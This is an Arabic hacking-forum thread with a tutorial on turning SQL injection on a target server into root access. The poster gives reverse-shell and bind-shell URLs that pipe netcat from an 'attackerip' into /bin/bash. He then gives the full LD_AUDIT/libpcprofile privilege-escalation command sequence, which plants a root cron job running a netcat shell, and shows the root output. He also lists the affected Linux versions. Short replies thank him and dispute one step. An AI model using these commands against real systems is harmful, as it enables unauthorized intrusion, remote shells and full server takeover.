sqli-bsqli = remote root :)

[hacker2020]

[align=center]
اولا :- عمليه الاكسس

ثانيا:- عمليه التروييت مباشره

بسم الله نبداء :-

اولا لو انت بتستهدف سرفر من الشائع جدا انك تلاقى فيه ثغره زى ال sql او ال bsql ومنها ممكن تعمل انك تحقن ملف او كود معين فى السرفر من خلال ال dumpfile/outfile وده مش موضوعنا النهارده انما الموضوع كله هيبتدى فى الملف او الكود الى هنحقنه !

طيب عند حقن الملف اغلب الناس بتفكر انها تحقن شل او حتى لما بيشوفوا ثغره sql على طوول بيستعرض الجداول ويدور على اللوحة علشان يرفع شل !!!

بس النهارده مش عاوز شلات خالص تابعوا معى:-

بدل ما نحقن شل وندخل بصلاحيه اما user او no**** بس عاوزين نتخطى الصلاحيات ونوجد مكان نطبق منه الاوامر يبقى ممكن نحقن باك دوور او اى كود تانى يساعدنا اننا نعمل باك كونكت
طبعا الاكواد دى متوفره بلغات كتيير ولو دورت عليها هتلاقيها انما انا بفضل الباك دوورز بلغة ال php او البيرل فى العمليه دى لانها اسرع ومفهاش تعقديات كتير !

انا هنا هستخدم اداه اسمها php backdoor للاتصال بالسرفر من النت كات هتلاقوها هنا

او ممكن تسخدم الكود ده وتحاول تحقنة فى اى ملف فى السرفر وتستعرضة بعدين

<?php $File = "/tmp/nc";
$Handle = fopen($File, 'w');
$Data = "\x41\x42\x43\x44";
fwrite($Handle, $Data);
fclose($Handle); ?>

طيب ولنفترض اننا نجحنا فى حقن الملف وده الطبيعى هندخل دلوقت للمتصفح عندنا ونستعرض الملف الى احنا كنا بنحقن بيه بالطريقة دى

victim_ip/xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bash

لاننا بنستخدم اتصال عكسى اما لو هنستخدم باك دوور بيرل يبقى ساعتها هنستخدم الرابط ده

victim_ip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bash

طيب دلوقت بعد ما حقنا الكود بتاع الباك دوور وعرفنا نستعرضة بمجر ما نستعرض واحد من الاتنين الى فوق من المتصفح ندخل على النت كات عندك سواء كنت بتستخدم ويندوز او لينكس واعمل تنصت كالتالى

nc victimip 9999

دلوقت نشوف النتيجة

nc victimip 9999
id
uid=65534(no****) gid=65534(nogroup) groups=65534(nogroup)

طبعا الصلاحيه هنا نوبادى دلوقت هندخل على المرحله التانيه وهى تخطى الصلاحيات عن طريق ثغره ال DSO وهى منتشره فى الرابط ده هنا

دلوقت نشوف التطبيق تابعوا معى انا هنا هشتغل لانى داخل من اتصال عكسى تابعوا معى الاوامر

$ umask 0
$ echo -e '/bin/nc localhost 8888 | /bin/bash' > /tmp/exploit.sh
$ echo -e '/bin/nc localhost 8888 | /bin/bash' > /tmp/exploit.sh
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
nc attackerip 79
id

طبق الاوامر الى فاتت بالترتيب هتلاقى صلاحيتك رووت

uid=0(root) gid=0(root) groups=0(root)

اعتقد كده ووصلنا للروت ودى

بعض الملاحظات :-

اولا:- دى النسخ الى تم تجربت الطريقة عليها :-
2.12.1, FC13
2.5, RHEL5 / CentOS5
2.11.1, Ubuntu 10
وكمان Debian <=5.0.6 /Ubuntu <=10.04

وكل النسخ القائمة عليها

ثانيا:- كان ممكن اننا ننفذ كل حاجة برابط واحد وبامر واحد بس انا هنا كنت قاصد انى اطول فى الشرح شوية
علشان اوصل معلومه واحده لكل الاعضاء الا وهى

لان الان كل الى يرفع شل عن قريب اما بياخد ساسبند او ان الموقع بيقف لوحده او ان الشل بيرفع صفحة بيضاء او ان كل دوال الشل تكون غير فعاله لذلك حبيت الفت انتباهكم لاهميه موضوع الاتصال العكسى وده الى هنتكلم عليه فى مواضيعنا القادمه باذن الله [/align]

 

[darkman.dz]

أيها الأخ

1- هذا الكلام "ممكن تعمل انك تحقن ملف او كود معين فى السرفر من خلال ال outfile " كلام غير منطقي إطلاقا
و الظاهر أنك عملت copy/past
أنا متأكد جدا لأنه تم إغلاق الثغرة هاذي مع إصدارات البي إتش بي الجديدة
أتمنى أن تتقبل كلامي بكل رحابة صدر
و الختام مسك وسلام
وحبذا لو تغير نص الموضوع
وشكرا على الموضوع الرائع

 

[hacker2020]

[align=center]شكرا [/align]

 

[KaLa$nikoV]

يعطيك العافيه وتسلم ع اساليب الاتصال العكسي ....

ما قصرت